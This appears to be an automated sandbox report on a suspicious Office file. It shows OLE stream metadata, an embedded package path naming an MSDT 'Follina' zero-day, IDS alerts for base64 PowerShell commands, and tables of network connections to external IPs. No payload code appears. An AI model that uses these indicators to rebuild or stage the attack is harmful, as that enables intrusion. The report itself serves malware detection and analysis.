Number of Paragraphs: | 1 |
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0000 |
General | |
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 76 |
Entropy: | 3.093449526469053 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . 9 q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | \x1Ole10Native |
File Type: | data |
Stream Size: | 2240124 |
Entropy: | 0.005070123031127669 |
Base64 Encoded: | True |
Data ASCII: | x . " . . . N e w B i t m a p i m a g e . b m p . D : \\ S a y a a r \\ P e r s o n a l \\ C o d i n g \\ M S D T Z e r o - D a y \\ M S F o l l i n a \\ N e w B i t m a p i m a g e . b m p . . . . . ^ . . . C : \\ U s e r s \\ k a r e w \\ A p p D a t a \\ L o c a l \\ T e m p \\ { 4 9 2 A 0 5 A 6 - 0 F C E - 4 3 E 2 - A F E 7 - D D 9 A E A 8 4 F C 1 B } \\ N e w B i t m a p i m a g e . b m p . 6 , " . B M 6 , " . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . , " . . . . . . . . . . . . . . . . . |
Data Raw: | 78 2e 22 00 02 00 4e 65 77 20 42 69 74 6d 61 70 20 69 6d 61 67 65 2e 62 6d 70 00 44 3a 5c 53 61 79 61 61 72 5c 50 65 72 73 6f 6e 61 6c 5c 43 6f 64 69 6e 67 5c 4d 53 44 54 20 5a 65 72 6f 2d 44 61 79 5c 4d 53 46 6f 6c 6c 69 6e 61 5c 4e 65 77 20 42 69 74 6d 61 70 20 69 6d 61 67 65 2e 62 6d 70 00 00 00 03 00 5e 00 00 00 43 3a 5c 55 73 65 72 73 5c 6b 61 72 65 77 5c 41 70 70 44 61 74 61 |
General | |
Stream Path: | \x3EPRINT |
File Type: | Windows Enhanced Metafile (EMF) image data version 0x10000 |
Stream Size: | 10172 |
Entropy: | 3.928478624213631 |
Base64 Encoded: | False |
Data ASCII: | . . . . l . . . . . . . . . . . . . . I . . . . . . . . . . . ' . . . 9 . . . E M F . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . . R . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . e . g . o . e . . U . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 00 00 00 6c 00 00 00 18 00 00 00 00 00 00 00 d7 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 27 0f 00 00 39 05 00 00 20 45 4d 46 00 00 01 00 bc 27 00 00 0d 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 38 04 00 00 35 01 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 b7 04 00 b0 a7 02 00 0a 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 |
General | |
Stream Path: | \x3ObjInfo |
File Type: | data |
Stream Size: | 6 |
Entropy: | 1.2516291673878228 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . |
Data Raw: | 00 00 03 00 0d 00 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
08/18/22-04:23:24.931708 | TCP | 2025010 | ET TROJAN Powershell commands sent B64 1 | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
08/18/22-04:23:28.806682 | TCP | 2025010 | ET TROJAN Powershell commands sent B64 1 | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Aug 18, 2022 04:23:06.193463087 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.193548918 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:06.193672895 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.207406998 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.207438946 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:06.380359888 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:06.380518913 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.391787052 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.391815901 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:06.392262936 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:06.392323017 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.842437029 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:06.883389950 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:07.087683916 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:07.087789059 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:07.087824106 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:07.090807915 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:07.103862047 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:07.103905916 CEST | 443 | 49173 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:07.103915930 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:07.103952885 CEST | 49173 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:19.050564051 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.050672054 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.050815105 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.051099062 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.051130056 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.212224960 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.212358952 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.222294092 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.222328901 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.222820044 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.245089054 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.291367054 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.499521971 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.499900103 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.499938011 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.499965906 CEST | 49174 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:19.499972105 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:19.500001907 CEST | 443 | 49174 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:23.998555899 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:23.998600960 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:23.998675108 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:23.999838114 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:23.999859095 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.163655043 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.163757086 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:24.169996977 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:24.170021057 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.170578957 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.209079981 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:24.255384922 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.468491077 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.468570948 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.468777895 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:24.469403028 CEST | 49175 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:24.469420910 CEST | 443 | 49175 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:24.496511936 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.496556044 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.496635914 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.496906042 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.496921062 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.656685114 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.656788111 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.664288998 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.664318085 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.667854071 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.667876959 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.921617985 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.921694994 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.921843052 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.921859026 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.921871901 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.921907902 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.931603909 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.931698084 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.931782007 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:24.931821108 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.931837082 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.932337999 CEST | 49176 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:24.932358980 CEST | 443 | 49176 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.210772991 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.210839987 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.210918903 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.211433887 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.211458921 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.373008013 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.373100042 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.381207943 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.381238937 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.384861946 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.384892941 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.612524986 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.612626076 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.612701893 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.612737894 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.614072084 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.614108086 CEST | 443 | 49177 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.614263058 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.614304066 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.858321905 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.858359098 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.858422041 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.858665943 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.858675003 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.012851000 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.013005018 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.026124954 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.026143074 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.031104088 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.031117916 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.270103931 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.270303011 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.270345926 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.270406961 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.270442963 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.270478964 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.272536039 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.272553921 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.272562981 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.272663116 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.277162075 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.277194977 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.277292013 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.277452946 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.277466059 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.435266018 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.435353041 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.445326090 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.445354939 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.448277950 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.448295116 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.704734087 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.704863071 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.704864979 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.704927921 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.707458973 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.707493067 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.707508087 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.707556963 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.960454941 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:27.960529089 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:27.960603952 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:27.960980892 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:27.961014032 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.121545076 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.121634007 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:28.129580975 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:28.129622936 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.130244017 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.137130976 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:28.179383039 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.368267059 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.368328094 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.368494987 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:28.368623018 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:28.368648052 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.368650913 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:28.368657112 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.386130095 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.386181116 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.386297941 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.386497021 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.386511087 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.540741920 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.540919065 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.553978920 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.554003954 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.557967901 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.557991028 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806519985 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806607008 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806664944 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.806685925 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806705952 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.806710005 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806740046 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.806747913 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806757927 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.806785107 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806796074 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.806828022 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.815222979 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.815262079 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.987804890 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.987871885 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.988006115 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.988214970 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.988235950 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.143070936 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.143218040 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.151287079 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.151323080 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.154943943 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.154972076 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.408413887 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.408503056 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.408638000 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.408730030 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.408745050 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.408781052 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.408834934 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.584225893 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.584290028 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.584357977 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.584625959 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.584644079 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.739150047 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.739248037 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.747014046 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.747044086 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.750628948 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.750654936 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.972436905 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.972520113 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.972626925 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.972666979 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.972753048 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.972784042 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.972795963 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.972835064 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Aug 18, 2022 04:23:06.071744919 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:06.182066917 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22 |
Aug 18, 2022 04:23:18.824484110 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:18.931935072 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22 |
Aug 18, 2022 04:23:18.939836979 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:19.049377918 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22 |
Aug 18, 2022 04:23:23.852726936 CEST | 50134 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:23.871582985 CEST | 53 | 50134 | 8.8.8.8 | 192.168.2.22 |
Aug 18, 2022 04:23:23.885284901 CEST | 55275 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:23.994752884 CEST | 53 | 55275 | 8.8.8.8 | 192.168.2.22 |
Aug 18, 2022 04:23:27.740761995 CEST | 59915 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:27.850553036 CEST | 53 | 59915 | 8.8.8.8 | 192.168.2.22 |
Aug 18, 2022 04:23:27.853646040 CEST | 54408 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:27.959486961 CEST | 53 | 54408 | 8.8.8.8 | 192.168.2.22 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Aug 18, 2022 04:23:06.071744919 CEST | 192.168.2.22 | 8.8.8.8 | 0xeea0 | Standard query (0) | | A (IP address) | IN (0x0001) |
